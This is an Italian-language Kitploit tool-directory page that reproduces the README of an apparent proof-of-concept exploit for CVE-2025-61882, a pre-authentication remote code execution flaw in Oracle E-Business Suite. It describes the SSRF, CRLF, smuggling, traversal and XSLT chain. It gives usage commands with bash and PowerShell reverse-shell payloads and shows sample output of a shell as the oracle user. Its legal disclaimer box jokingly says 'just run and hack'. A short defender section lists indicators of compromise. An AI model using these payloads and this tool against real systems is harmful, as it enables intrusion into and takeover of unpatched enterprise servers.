Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61882-POC — Exploit per CVE-2025-61882, una RCE critica pre-autenticazione in Oracle E-Business Suite. Combina SSRF, iniezione CRLF, HTTP smuggling e iniezione XSLT per l'esecuzione remota di codice senza autenticazione. | Kitploit
Strumenti/GitHubGitHub/mindflarex/cve-2025-61882-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubmindflarex/cve-2025-61882-poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2025-61882-POC

Exploit per CVE-2025-61882, una RCE critica pre-autenticazione in Oracle E-Business Suite. Combina SSRF, iniezione CRLF, HTTP smuggling e iniezione XSLT per l'esecuzione remota di codice senza autenticazione.

Vedi Repository
23 mesi faNon ancora revisionato
Condividi

Strumento di Test di Sicurezza CVE-2025-61882

CVSS Status Platform License

🚨 AVVISO LEGALE CRITICO

Consulta il nostro post sul blog per i dettagli tecnici

QUESTO STRUMENTO È SOLO PER TEST DI SICUREZZA AUTORIZZATI

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Panoramica

Strumento di test di sicurezza per CVE-2025-61882, una vulnerabilità critica di esecuzione remota di codice pre-autenticazione che colpisce Oracle E-Business Suite.

Creato da: Mindflare

Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-61882
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore di Attacco: Rete (Non autenticato)
  • Complessità dell'Attacco: Media
  • Privilegi Richiesti: Nessuno
  • Interazione dell'Utente: Nessuna
  • Versioni Interessate: Oracle E-Business Suite 12.2.3 - 12.2.14
  • Stato della Patch: Patch di emergenza rilasciata il 4 ottobre 2025
  • Stato dello Sfruttamento: ⚠️ ATTIVAMENTE SFRUTTATO dal ransomware Cl0p da agosto 2025

Riepilogo Tecnico

CVE-2025-61882 è una sofisticata catena di exploit che combina cinque vulnerabilità distinte:

  1. SSRF - Server-Side Request Forgery tramite /OA_HTML/configurator/UiServlet
  2. Iniezione CRLF - Iniezione di header HTTP nel parametro return_url
  3. HTTP Smuggling - Abuso della connessione keep-alive per raggiungere servizi interni (porta 7201)
  4. Bypass dell'Autenticazione - Path traversal tramite il prefisso /OA_HTML/help/../
  5. Iniezione XSLT - L'elaborazione di template XSL dannosi porta a RCE

🎯 Casi d'Uso Previsti

✅ Uso Consentito

  • Test di penetrazione autorizzati con permesso scritto
  • Ricerca sulla sicurezza su sistemi di tua proprietà
  • Validazione delle vulnerabilità in ambienti di laboratorio controllati
  • Esercitazioni red team con documentazione adeguata dell'ambito
  • Ricerca accademica con approvazione istituzionale
  • Risposta agli incidenti e analisi forense

❌ Uso Proibito

  • Qualsiasi accesso non autorizzato ai sistemi
  • Test su sistemi senza esplicito permesso scritto
  • Attività dannose o causare danni
  • Attaccare sistemi in produzione senza approvazione
  • Utilizzo per scopi criminali
  • Qualsiasi attività che violi le leggi applicabili

📦 Installazione

Prerequisiti

  • Python 3.7 o superiore
  • Gestore di pacchetti pip
  • Connettività di rete verso il target (solo autorizzato)
  • Netcat o un listener simile per ricevere la reverse shell

Configurazione

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Utilizzo

Passo 1: Configura il Tuo Listener

In un terminale separato, avvia un listener netcat:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Passo 2: Esegui lo Strumento

Utilizzo Base (Target Linux):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Target Windows:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Parametri

ParametroDescrizioneRichiestoEsempio
--targetURL Oracle EBS del targetSìhttp://192.168.1.22:8000
--lhostIl tuo indirizzo IP (per i callback)Sì192.168.1.10
--lportPorta del server HTTP (serve il payload XSL)Sì80 o 8080
--commandComando da eseguire sul targetSìVedi gli esempi sopra
--platformSistema operativo del target: linux o windowsSìlinux

📊 Output di Esempio

Output dello Strumento

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Output del Listener Netcat (Se Vulnerabile)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Rilevamento e Difesa

Per i Difensori della Sicurezza

Azioni Immediate

  1. Applica la Patch di Emergenza Oracle (Document ID: 30061882.1)
  2. Cerca Compromissioni:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Esamina i Log di Accesso da agosto 2025
  4. Blocca il traffico internet in uscita dai server EBS

Indicatori di Rilevamento

IOC di Rete:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondario)

Pattern HTTP:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • Caratteri CRLF nei parametri

📚 Riferimenti

  • Avviso di Oracle Security Alert
  • Catalogo CISA KEV
  • Analisi di Google/Mandiant
  • Ricerca di watchTowr Labs

📜 Licenza

Licenza MIT con Restrizioni per Uso Educativo - Vedi LICENSE

DICHIARAZIONE DI NON RESPONSABILITÀ: Questo software è solo per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.


root@kitploit:~

**Creato da:** Mindflare | **Ultimo aggiornamento:** ottobre 2025
Scarica lo strumento